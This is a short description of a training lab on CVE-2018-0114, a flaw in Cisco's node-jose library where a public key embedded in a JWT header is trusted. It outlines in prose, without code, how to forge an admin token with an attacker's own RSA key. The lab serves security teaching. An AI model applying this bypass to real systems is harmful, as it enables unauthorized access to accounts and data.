CVE-2018-0114

This lab focuses on exploiting CVE-2018-0114, a critical vulnerability in Cisco's node-jose library that permits an attacker to embed a public key in the JWT header. This vulnerability arises because the application trusts the embedded public key, allowing malicious actors to sign tokens with their private keys and bypass authentication mechanisms. You'll begin by generating an RSA key pair, then craft a JWT header incorporating the public key component. Finally, you'll use Python and OpenSSL to sign the token, tricking the application into granting admin access.

The exercise provides an in-depth look at the mechanics of JWT and the pitfalls of trusting user-provided keys. By understanding the vulnerability and crafting a working exploit, you'll gain valuable insights into securing JWT implementations and recognizing potential weaknesses in existing systems. The lab is a practical demonstration of how even signed tokens can be manipulated if the underlying libraries are not securely implemented.